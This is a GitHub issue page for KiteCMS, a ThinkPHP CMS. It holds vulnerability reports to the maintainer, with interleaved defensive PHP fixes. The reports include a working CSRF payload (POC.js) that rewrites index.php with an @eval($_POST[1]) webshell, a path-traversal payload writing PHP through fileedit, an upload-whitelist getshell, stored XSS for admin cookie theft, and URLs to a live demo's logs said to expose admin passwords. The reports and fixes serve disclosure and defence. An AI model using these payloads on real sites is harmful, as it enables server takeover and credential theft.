kitesky / kitecms

43.0 4.0 17.0 20.44 MB

KiteCMS is built on ThinkPHP 5.1.37. It is genuinely open source and free, may be used for commercial purposes, and requires no licence of any kind. The system will keep being improved and optimised, with more practical modules, plugins and templates to come. Official QQ group: 3337800. Backend admin demo: http://test.19981.com/admin, account/password admin/admin

Home Page: http://www.kitesky.com

License: Other

PHP 49.64% HTML 19.21% CSS 7.08% JavaScript 22.92% PLpgSQL 0.13% Smarty 0.80% Less 0.10% SCSS 0.12%
Topics: cms, phpcms


kitecms's Issues

Error when logging in to the backend after installation

Undefined array index: SERVER_ADDR

index.php/admin/index/index.html
    $data['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : $_SERVER['LOCAL_ADDR'];

PHP version: php-7.3.11-Win32-VC15-x64
Web server: Caddy 1.x

Through XSS Vulnerability + CSRF Vulnerability to Getshell

Hello,
Through an audit of the source code, I found that the combination of an XSS vulnerability and a CSRF vulnerability can be used to get a shell.
First, we use the stored XSS vulnerability in the front-end comments, or the XSS vulnerability in the front-end member registration, to inject a <script> tag whose src attribute references a JS POC on the attacker's server. For this test we put the JS POC on the current server.
LOOK~
We can modify any file on the server; here we modify index.php.
Here is the source code of the index.php file before the modification.
[image]
Now we just do it.
We insert a reference to the XSS payload in the comments section.
[image]

POC.js:

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/admin/template/fileedit.html", false);
    var data;
    data = "path=Li9pbmRleC5waHA=&html=%3C%3Fphp%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+ThinkPHP+%5B+WE+CAN+DO+IT+JUST+THINK+%5D%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Copyright+(c)+2006-2018+http%3A%2F%2Fthinkphp.cn+All+rights+reserved.%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Licensed+(+http%3A%2F%2Fwww.apache.org%2Flicenses%2FLICENSE-2.0+)%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%2F%2F+%7C+Author%3A+liu21st+%3Cliu21st%40gmail.com%3E%0D%0A%2F%2F+%2B----------------------------------------------------------------------%0D%0A%0D%0A%2F%2F+%5B+%E5%BA%94%E7%94%A8%E5%85%A5%E5%8F%A3%E6%96%87%E4%BB%B6+%5D%0D%0Anamespace+think%3B%0D%0A%0D%0A%2F%2F+%E5%8A%A0%E8%BD%BD%E5%9F%BA%E7%A1%80%E6%96%87%E4%BB%B6%0D%0Arequire+__DIR__+.+'%2Fthinkphp%2Fbase.php'%3B%0D%0A%0D%0A%2F%2F+%E6%94%AF%E6%8C%81%E4%BA%8B%E5%85%88%E4%BD%BF%E7%94%A8%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95%E8%AE%BE%E7%BD%AERequest%E5%AF%B9%E8%B1%A1%E5%92%8CConfig%E5%AF%B9%E8%B1%A1%0D%0A%0D%0A%2F%2F+%E6%89%A7%E8%A1%8C%E5%BA%94%E7%94%A8%E5%B9%B6%E5%93%8D%E5%BA%94%0D%0AContainer%3A%3Aget('app')-%3Erun()-%3Esend()%3B%0D%0Aphpinfo()%3B%0D%0A%40eval(%24_POST%5B1%5D)%3B";
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhr.send(data);

Once we post the POC, it is triggered after the administrator logs in to the backend.
[image]

Thank you~

ThinkPHP log information leak vulnerability exists in KiteCMS v1.1

Hello, after testing I found that KiteCMS v1.1 has a vulnerability: ThinkPHP log information leak.
Anyone can read ThinkPHP's log through a URL. These logs contain the administrator's user name, password, operation history, system information, etc. Such sensitive information poses a serious security risk to the system.

URL: http://domain(or IP)/runtime/log/202107/10.log

For example:
http://test.19981.com/runtime/log/202107/10.log
http://test.19981.com/runtime/log/202107/03.log

[image]

File upload vulnerability leads to getshell

  1. Log in to the website backend
     url: /index.php/admin/passport/login.html

  2. Add the php file extension
     System -> site config -> upload -> image extension

  3. Upload a malicious script through the upload interface
     Use Burp to bypass the JS check

  4. Get the path of the uploaded file

  5. Get shell

Code audit

/application/admin/controller/Upload.php uploadFile()

    public function uploadFile()
    {
        // get the file uploaded through the form
        $file = Request::file('file');

        $uploadObj = new UploadFile($this->site_id);
        $ret = $uploadObj->upload($file, 'image');

        if ($ret) {
            return $this->response(200, '上传成功', $ret);
        } else {
            return $this->response(201, $uploadObj->getError());
        }
    }

Follow the function: upload()

/application/common/model/UploadFile.php

According to line 16 of Upload.php, the second parameter of the upload function is 'image'.

    public function upload($file, $fileType = 'image')
    {
        // validate the file type and size
        switch ($fileType)
        {
            case 'image':
                $result = $file->check(['ext' => $this->config['upload_image_ext'], 'size' => $this->config['upload_image_size']*1024]);
                if(empty($result)){
                    // upload failed, fetch the error message
                    $this->error = $file->getError();
                    return false;
                }
                break;
            .....

Follow the function: check()

thinkphp/library/think/File.php

$rule has been modified to: {ext=> "jpg,png,gif,php", size=>2097152}

    public function check($rule = [])
    {
        $rule = $rule ?: $this->validate;

        if ((isset($rule['size']) && !$this->checkSize($rule['size']))
            || (isset($rule['type']) && !$this->checkMime($rule['type']))
            || (isset($rule['ext']) && !$this->checkExt($rule['ext']))
            || !$this->checkImg()) {
            return false;
        }

        return true;
    }

The file size does not exceed the maximum, php is in the whitelist of file extensions, and $rule['type'] is not set, so follow the function: checkImg()

    public function checkImg()
    {
        $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION));

        /* strict check for image files */
        if (in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) && !in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13])) {
            $this->error = 'illegal image files';
            return false;
        }

        return true;
    }

The value of the variable $extension is php, so the first half of the conditional statement is false.

The function checkImg returns true, and so check() returns true.
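The audit above shows why a configurable extension whitelist is the wrong control: once an administrator (or an attacker holding an admin session) adds "php" to upload_image_ext, check() passes. The following is an added example, not KiteCMS code, of an image-upload check that keeps the allow-list fixed in code, rejects executable inner extensions such as "x.php.jpg", and verifies the file content with getimagesize() independently of the name. The function names, the test file names and the embedded 1x1 PNG are constructed for the demo.

```php
<?php
// Added example for the file-upload report above; this is not KiteCMS code.
// It assumes an image-only upload endpoint and constructs its own test files.
declare(strict_types=1);

// Fixed allow-list kept in code, so that widening the site config's
// "upload image extension" setting cannot make php uploadable.
const SAFE_IMAGE_EXT = ['jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp'];

// Which IMAGETYPE_* value (as returned by getimagesize) each extension must match.
const IMAGETYPE_TO_EXT = [
    IMAGETYPE_GIF  => ['gif'],
    IMAGETYPE_JPEG => ['jpg', 'jpeg'],
    IMAGETYPE_PNG  => ['png'],
    IMAGETYPE_BMP  => ['bmp'],
    IMAGETYPE_WEBP => ['webp'],
];

// Extensions that must never appear anywhere in the name, even as an inner
// segment such as "x.php.jpg" (some server configurations execute those).
const EXECUTABLE_EXT = ['php', 'phtml', 'phar', 'php3', 'php5', 'php7', 'phps'];

/**
 * Validate an upload by its original name and its temporary path on disk.
 * Returns null when the file is acceptable, otherwise a rejection reason.
 */
function validateImageUpload(string $originalName, string $tmpPath, int $maxBytes = 2097152): ?string
{
    $segments = explode('.', basename($originalName));
    if (count($segments) < 2) {
        return 'missing extension';
    }
    $ext = strtolower(array_pop($segments));
    foreach ($segments as $inner) {
        if (in_array(strtolower($inner), EXECUTABLE_EXT, true)) {
            return 'executable extension inside file name';
        }
    }
    if (!in_array($ext, SAFE_IMAGE_EXT, true)) {
        return 'extension not in image allow-list';
    }

    $size = @filesize($tmpPath);
    if ($size === false || $size > $maxBytes) {
        return 'file missing or larger than ' . $maxBytes . ' bytes';
    }

    // Content check that depends neither on the name nor on config: the bytes
    // must parse as an image, and the detected type must agree with $ext.
    $info = @getimagesize($tmpPath);
    $type = is_array($info) ? $info[2] : null;
    if ($type === null || !isset(IMAGETYPE_TO_EXT[$type])) {
        return 'content is not a recognised image';
    }
    if (!in_array($ext, IMAGETYPE_TO_EXT[$type], true)) {
        return 'extension does not match image content';
    }
    return null;
}

/** Storage name chosen by the server, never derived from the client's name. */
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: a real 1x1 PNG, and PHP source carrying image-like names.
if (PHP_SAPI === 'cli') {
    $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
    $cases = [
        ['photo.png',     $png,             null],
        ['shell.php',     '<?php echo 1;',  'extension not in image allow-list'],
        ['shell.php.png', $png,             'executable extension inside file name'],
        ['fake.png',      '<?php echo 1;',  'content is not a recognised image'],
    ];
    foreach ($cases as [$name, $bytes, $expected]) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        $reason = validateImageUpload($name, $tmp);
        unlink($tmp);
        printf("%-14s -> %s (expected: %s)\n", $name, $reason ?? 'accepted as ' . storedName('png'), $expected ?? 'accepted');
    }
}
```

The upload directory should additionally have script execution disabled at the web-server level, so that a check bypass still does not yield code execution; the content check here is a second layer, not a replacement for that.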

Code execution vulnerability causes RCE

  1. Log in to the backend of the site
     url: /index.php/admin/passport/login.html
  2. Add the vulnerable URL
     url: /index.php/admin/Template/fileedit
     Convert it to a POST request
     [image]
     let contract
     [image]
  3. Access the index.php generated in the root directory
     url: /index.php?a=whoami
     [image]

Code audit

The vulnerable file is located at: /application/admin/controller/Template.php -> fileedit()
[image]
$path and $html are under our control, and $rootpath is concatenated with them.
And the path variable can be given a ../ directory traversal.
The html variable is written out containing our PHP code.
The html is decoded, but that has no effect on the PHP code.
So we can find an existing file to overwrite.
The POST payload is:
path=../../index.php&html=(your php code)
Finally, the command is executed at index.php.
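The root cause described above is that the concatenated path is used as-is, so "../" segments leave the template directory. As an added example, not KiteCMS code, the function below canonicalises the requested path with realpath() and refuses anything that resolves outside the template root or that carries an executable extension even inside the root. The directory layout, file names and the EDITABLE_EXT list are assumptions for the demo.

```php
<?php
// Added example for the template-edit report above; this is not KiteCMS code.
// It assumes templates live under one root directory and that only the listed
// text extensions may be edited; the demo builds its own temporary tree.
declare(strict_types=1);

const EDITABLE_EXT = ['html', 'htm', 'css', 'js'];

/**
 * Resolve a client-supplied relative path against the template root and return
 * the canonical absolute path, or null when the request must be refused.
 */
function resolveTemplatePath(string $rootPath, string $relPath): ?string
{
    $root = realpath($rootPath);
    if ($root === false) {
        return null;
    }
    // NUL bytes and absolute paths are never legitimate template references.
    if ($relPath === '' || strpos($relPath, "\0") !== false
        || $relPath[0] === '/' || $relPath[0] === '\\' || preg_match('/^[A-Za-z]:/', $relPath)) {
        return null;
    }
    // realpath() collapses ../ segments and symlinks; the target has to exist
    // already, which matches an editor that overwrites existing template files.
    $target = realpath($root . DIRECTORY_SEPARATOR . $relPath);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment: the canonical target must start with "<root>/".
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Even inside the root, never let the editor touch executable files.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!in_array($ext, EDITABLE_EXT, true)) {
        return null;
    }
    return $target;
}

/** Write template content only after the path has been validated. */
function saveTemplate(string $rootPath, string $relPath, string $content): bool
{
    $target = resolveTemplatePath($rootPath, $relPath);
    if ($target === null) {
        return false;
    }
    return file_put_contents($target, $content, LOCK_EX) !== false;
}

// Constructed layout: <tmp>/index.php beside <tmp>/templates/default/index.html
if (PHP_SAPI === 'cli') {
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl-demo-' . bin2hex(random_bytes(4));
    $root = $base . '/templates';
    mkdir($root . '/default', 0700, true);
    file_put_contents($root . '/default/index.html', '<h1>hello</h1>');
    file_put_contents($base . '/index.php', '<?php // application entry');
    file_put_contents($root . '/evil.php', '<?php // planted inside the root');

    $attempts = ['default/index.html', '../index.php', 'default/../../index.php', 'evil.php', '/etc/hostname'];
    foreach ($attempts as $p) {
        $ok = saveTemplate($root, $p, '<h1>edited</h1>');
        printf("%-28s -> %s\n", $p, $ok ? 'written' : 'refused');
    }

    // Clean up the temporary tree.
    foreach ([$root . '/default/index.html', $root . '/evil.php', $base . '/index.php'] as $f) {
        unlink($f);
    }
    rmdir($root . '/default'); rmdir($root); rmdir($base);
}
```

Only the first attempt is written; "../index.php" and "default/../../index.php" both canonicalise to a file outside the root and are refused, "evil.php" is refused by the extension rule, and the absolute path never reaches the filesystem. A string-level check such as rejecting ".." alone would miss symlinks and encoded variants, which is why the comparison is done on the realpath() result.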

Xss vulnerability

Hello author, I am honoured to be able to use your CMS, but while using it I found after testing that there are quite a few vulnerabilities. I hope to draw your attention to them, thank you.
Here are some stored XSS vulnerabilities, as follows:
A stored XSS in a front-end comment can be used to obtain the backend administrator's cookie information:
[image]
When a front-end user registers, the XSS vulnerability can be used to acquire the administrator's cookie and perform other operations, leaking the administrator's cookie and letting the attacker enter the backend.
[image]
The first and the second:
[image]
The results are as follows:
[image]
The third and the fourth:
[image]
The fifth and the sixth:
[image]
Using the same POC, you will find more:
[image]
and so on.
There are too many XSS vulnerabilities.
There are seriously dangerous features in the backend configuration. I don't know whether this counts as a vulnerability, but I recommend disabling this function. Once you get past the comment XSS in the front end or the XSS vulnerability in user registration, you can obtain the administrator's cookie and enter the backend, which leads to getshell and the server falling.
[image]
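Both XSS reports on this page (the XSS + CSRF chain and the list of stored XSS points) share one root cause: comment bodies and member names are written into HTML without encoding. The following is an added example, not KiteCMS code, showing the two server-side mitigations a reviewer would ask for: contextual output encoding for every user-controlled value, and session cookie flags that keep the admin cookie out of reach of injected script. The markup, function names and the sample comment (with a placeholder host) are constructed.

```php
<?php
// Added example for the stored-XSS reports above; this is not KiteCMS code.
// It assumes comments and member names are rendered into HTML by the server;
// the sample comment below is constructed, with a placeholder host.
declare(strict_types=1);

/** Encode for an HTML text node or a double-quoted attribute value. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render one comment; every user-controlled value passes through e(). */
function renderComment(string $author, string $body): string
{
    return '<div class="comment" data-author="' . e($author) . '">'
         . '<b>' . e($author) . '</b>: ' . nl2br(e($body))
         . '</div>';
}

/**
 * Session cookie settings for the admin session: HttpOnly stops document.cookie
 * reads, SameSite=Strict keeps the cookie off cross-site requests, Secure keeps
 * it off plain HTTP. The array form of session_set_cookie_params needs PHP >= 7.3.
 */
function startHardenedSession(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

if (PHP_SAPI === 'cli') {
    // Constructed payload of the shape described in the reports: a script tag
    // pointing at an external host. After encoding it is inert text.
    $author = 'guest';
    $body   = "nice post\n<script src=\"http://attacker.invalid/poc.js\"></script>";
    echo renderComment($author, $body), "\n";
    // Output contains &lt;script src=&quot;...&quot;&gt; and no live <script> tag.
}
```

One caveat that matters for the chain described in the XSS + CSRF report: HttpOnly prevents cookie theft, but it does not stop script already running in the administrator's page from issuing same-origin requests such as the fileedit POST. Output encoding is therefore the primary fix; cookie flags and a Content-Security-Policy that disallows external script sources reduce the blast radius when a new injection point is found.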
